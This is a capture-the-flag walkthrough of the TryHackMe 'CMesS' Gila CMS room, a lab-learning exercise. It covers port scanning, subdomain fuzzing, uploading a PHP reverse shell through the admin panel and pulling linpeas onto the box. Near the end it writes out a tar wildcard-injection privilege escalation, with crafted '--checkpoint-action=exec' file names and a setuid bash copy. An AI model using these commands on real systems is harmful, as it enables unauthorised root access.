TryHackMe CMesS CTF
Can you root this Gila CMS box?
Room found here : https://tryhackme.com/room/cmess
In this machine, we have two flags stored in the user.txt and root.txt file.
Start Your Machine ………
We divide this machine into two tasks i.e Task 1 & Task 2
# [ Task 1 ] : Get the normal user flag stored in the user.txt file
Step 1-> Add your machine IP in /etc/hosts as cmess.thm name
Step 2 -> ping cmess.thm to check machine alive or not
Step 3 -> Performing port scanning
You can run it manually or use my script
#!/bin/bash
masscan -e tun0 $1 -p 1-65535 --rate 10000 > $1_masscan
cat $1_masscan | grep "Discovered open port" | awk {'print $4'} | tr -d /tcp >> $1_masscanP
cat $1_masscanP | while read b || [[ -n $b ]] ;do nmap -A -p"${b}" $1 ;done >> $1_nmap
# u also uncommnet below line
# rm $1_masscan
# rm $1_masscanP
# Usage : ./filaname.sh <ip>We got 3 disallow entries in the /robots.txt directory on cmess.thm but after navigating through it contains 403 forbidden message.
Step 4 -> Performing directory fuzzing
We using ffuf tool for directory fuzzing it’s my fav for fuzzing or brute-forcing.
Command : ffuf -w /root/Desktop/Wordlists/dir_big.txt -u http://cmess.thm/FUZZ
We got a long list of the directory but we try to navigate on it they ask for an email id and password for sign-in.
After that try to find an exploit related to the Gila cmess but not found anything interesting. With the help of Hint trying to brute-forcing the subdomains.
Step 5 -> Performing subdomain brute-forcing
Command : ffuf -w /root/Desktop/Wordlists/dir_big.txt -u http://cmess.thm/ -H “Host:FUZZ.cmess.thm” -fw “522”
We got a dev subdomain on cmess.thm try to access them but before that add this subdomain in our /etc/hosts file
Navigate on dev.cmess.thm find interesting stuff like this
Step 6 -> Try to log in on cmess.thm/admin with these credentials
We successfully login on to the andre admin panel
Step 7 -> Upload php reverse shell
Tried to explore all the tabs in the admin panel and we got some upload functionality. Try to upload reverse shell because the website is running on an Apache server then PHP is very convenient for reverse shell.
Change ip variable value with your IP and set port number
After uploading file is stores in the assets folder navigate to it
click on our file name and save this file. And start netcat listener on our machine. But from where we execute this file.
Start thinking ……….
Step 8 -> Get first reverse shell on machine
When we performed directory fuzzing we got a directory called /assets try to navigate it but they are blank try to append our file name with this like http://cmess.thm/assets/<filename> and hit enter
Booommmm ….
We got our shell but we can’t access andre folder that locates the user.txt file show permission-denied message.
Step 9 -> Find escalation path using linpeas.sh
linpeas.sh it’s an automated tool for finding the vulnerability in the Linux systems
Start python server on our local machine
After that with the help of wget download linpeas.sh in the /tmp folder.
Give execute permission to it chmod +x linpeas.sh run it ./linpeas.sh
We got one hidden bak file stored in /opt folder and cron job
Step 10 -> First flag
See the information in the .password.bak file using cat
It looks like the backup password of the andre but how we can use it? We know ssh is open on the 22 port try to sign in using this password.
command :- ssh andre@cmess.thm
We got our first flag .🤩
# [ Task 2 ] : Get the root user flag stored in the root.txt file
Step 1 ->Understand the cron job
Now we can access the andre’s folder let’s see what the cron job does that we find using linpeas
command :- cat /etc/crontab
In this scenario, every 2 min all the files and folders in the /home/andre/backup folder are backed up into the /tmp folder as andre_backup.tar.gz using tar but there is a catch i.e * (wildcard) it means anything in the /home/andre/backup folder is backup and we can use this functionality to abuse this machine.
Step 2 -> Create bash one liner
We simply create a bash one liner for getting root shell
echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash" > exploit.shIt can copy the /bin/bash into /tmp/bash and give it permission as setuid and setgid
Save this in to the /home/andre/backup folder. Give execute permission to it. and type two command as following .
touch /home/andre/backup/ — checkpoint=1 ( — checkpoint=1 is tar utitlity for display progress message after 1 record)
touch /home/andre/backup/ — checkpoint-action=exec=sh\ exploit.sh (It used for after every checkpoint run the specified action i.e run the exploit.sh)
Wait for 2 minutes …..
Type command: /tmp/bash -p (For execute /tmp/bash folder)
And we got our root shell …………… & flag……..
: Note :
If you are stuck somewhere and can’t find a way to penetrate the machine, never assume that you will do nothing or start doubting yourself. Look at the Hint. It is the method by which you learn something new. But before that, try all the weapons that you have in your arsenal.
Keep Learning …….
Thanks for Reading 💓…………
Connect me on:
